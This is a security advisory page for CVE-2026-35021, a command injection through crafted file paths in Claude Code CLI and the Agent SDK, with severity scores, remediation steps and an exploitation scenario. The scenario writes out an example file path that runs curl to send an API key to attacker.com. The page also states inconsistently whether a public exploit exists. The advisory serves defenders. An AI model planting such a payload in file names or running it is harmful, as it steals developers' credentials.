CVE-2026-35021 — HIGH (CVSS 7.8)

CISO Take

CVE-2026-35021 is an OS command injection (CWE-78) in Anthropic's Claude Code CLI and Claude Agent SDK, where malicious file paths containing shell metacharacters ($() or backticks) are interpolated unsafely into execSync calls — POSIX double-quote semantics do not prevent command substitution, so injected expressions are evaluated and executed. While the local attack vector (AV:L) limits opportunistic mass exploitation, the blast radius is significant: Claude Code is actively used by AI developers and security engineers who routinely open untrusted files, and the Agent SDK underpins any custom agentic application built on Anthropic's tooling. The vulnerability is not in CISA KEV and no public exploit exists yet, but low attack complexity (AC:L) with no required privileges means any attacker who can place a crafted file in a developer's workflow gains immediate code execution at the user's privilege level — including access to LLM API keys, cloud credentials, and SSH keys typically present in developer environments. Organizations using Claude Code CLI or building on the Claude Agent SDK should update to the patched release immediately; as an interim control, restrict opening files from untrusted sources and audit any code paths that pass external file paths to the SDK.

Sources: NVD VulnCheck ATLAS

What is the risk?

High risk for developer and AI engineering environments. CVSS 7.8 reflects high confidentiality, integrity, and availability impact with low attack complexity and no privilege requirement. The local attack vector constrains internet-scale exploitation, but developer workstations are high-value targets — they hold API keys, cloud credentials, source code, and deployment secrets. Claude Code's user base (AI developers, security engineers) makes the credential exfiltration scenario particularly damaging. No EPSS data, no active exploitation reported, no public PoC — but trivial exploitability means the window between disclosure and weaponization is narrow.

Severity & Risk

CVSS 3.1

7.8 / 10

EPSS

0.0%

chance of exploitation in 30 days

Higher than 12% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Local

AC Low

PR None

UI Required

S Unchanged

C High

I High

A High

What should I do?

5 steps

Update: Upgrade Claude Code CLI and Claude Agent SDK to the latest patched release immediately. Check Anthropic's security advisory for the fixed version.
Interim workaround: Avoid opening files whose paths originate from untrusted inputs (user uploads, cloned repositories, downloaded archives) in Claude Code CLI until patched.
SDK consumers: Audit any code using the Claude Agent SDK's prompt editor functionality that accepts external file paths; reject or sanitize paths containing shell metacharacters ($, `, \, ;, |, &) before passing to the SDK.
Detection: Review shell history and process logs for unexpected child processes spawned by node/claude-code processes. Alert on execSync calls with anomalous path arguments in EDR telemetry.
Credential rotation: If exploitation is suspected, immediately rotate all credentials stored in the developer environment — Anthropic API keys, cloud IAM credentials, and SSH keys.

CISA SSVC Assessment

Decision Attend

Exploitation poc

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Supply Chain Agent Framework AML.T0050 - Command and Scripting Interpreter AML.T0053 - AI Agent Tool Invocation AML.T0055 - Unsecured Credentials AML.T0083 - Credentials from AI Agent Configuration AML.T0112.000 - Local AI Agent

Compliance Impact

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2 - AI system security

NIST AI RMF

MANAGE-2.4 - Residual risks are managed

OWASP LLM Top 10

LLM07 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2026-35021?

CVE-2026-35021 is an OS command injection (CWE-78) in Anthropic's Claude Code CLI and Claude Agent SDK, where malicious file paths containing shell metacharacters ($() or backticks) are interpolated unsafely into execSync calls — POSIX double-quote semantics do not prevent command substitution, so injected expressions are evaluated and executed. While the local attack vector (AV:L) limits opportunistic mass exploitation, the blast radius is significant: Claude Code is actively used by AI developers and security engineers who routinely open untrusted files, and the Agent SDK underpins any custom agentic application built on Anthropic's tooling. The vulnerability is not in CISA KEV and no public exploit exists yet, but low attack complexity (AC:L) with no required privileges means any attacker who can place a crafted file in a developer's workflow gains immediate code execution at the user's privilege level — including access to LLM API keys, cloud credentials, and SSH keys typically present in developer environments. Organizations using Claude Code CLI or building on the Claude Agent SDK should update to the patched release immediately; as an interim control, restrict opening files from untrusted sources and audit any code paths that pass external file paths to the SDK.

Is CVE-2026-35021 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2026-35021, increasing the risk of exploitation.

How to fix CVE-2026-35021?

1. Update: Upgrade Claude Code CLI and Claude Agent SDK to the latest patched release immediately. Check Anthropic's security advisory for the fixed version. 2. Interim workaround: Avoid opening files whose paths originate from untrusted inputs (user uploads, cloned repositories, downloaded archives) in Claude Code CLI until patched. 3. SDK consumers: Audit any code using the Claude Agent SDK's prompt editor functionality that accepts external file paths; reject or sanitize paths containing shell metacharacters ($, `, \, ;, |, &) before passing to the SDK. 4. Detection: Review shell history and process logs for unexpected child processes spawned by node/claude-code processes. Alert on execSync calls with anomalous path arguments in EDR telemetry. 5. Credential rotation: If exploitation is suspected, immediately rotate all credentials stored in the developer environment — Anthropic API keys, cloud IAM credentials, and SSH keys.

What systems are affected by CVE-2026-35021?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI development pipelines, developer tooling.

What is the CVSS score for CVE-2026-35021?

CVE-2026-35021 has a CVSS v3.1 base score of 7.8 (HIGH). The EPSS exploitation probability is 0.04%.

Technical Details

NVD Description

Anthropic Claude Code CLI and Claude Agent SDK contain an OS command injection vulnerability in the prompt editor invocation utility that allows attackers to execute arbitrary commands by crafting malicious file paths. Attackers can inject shell metacharacters such as $() or backtick expressions into file paths that are interpolated into shell commands executed via execSync. Although the file path is wrapped in double quotes, POSIX shell semantics (POSIX §2.2.3) do not prevent command substitution within double quotes, allowing injected expressions to be evaluated and resulting in arbitrary command execution with the privileges of the user running the CLI.

Exploitation Scenario

An adversary targets an AI engineering team by embedding a malicious file path in a shareable artifact — for example, a Git repository containing a file whose path includes a command substitution expression such as $(curl https://attacker.com/exfil?k=$(cat ~/.anthropic/api_key)). When a developer clones the repository and opens the file in Claude Code CLI, or when a custom agentic application built on the Agent SDK invokes the prompt editor against it, the file path is interpolated into an execSync shell command. POSIX shell evaluates the $() expression within the double-quoted string, executing the injected command under the developer's user context. The attacker receives the Anthropic API key — and potentially AWS credentials, SSH keys, or database secrets — exfiltrated to their controlled endpoint, all triggered by a routine developer workflow with no visible indication of compromise.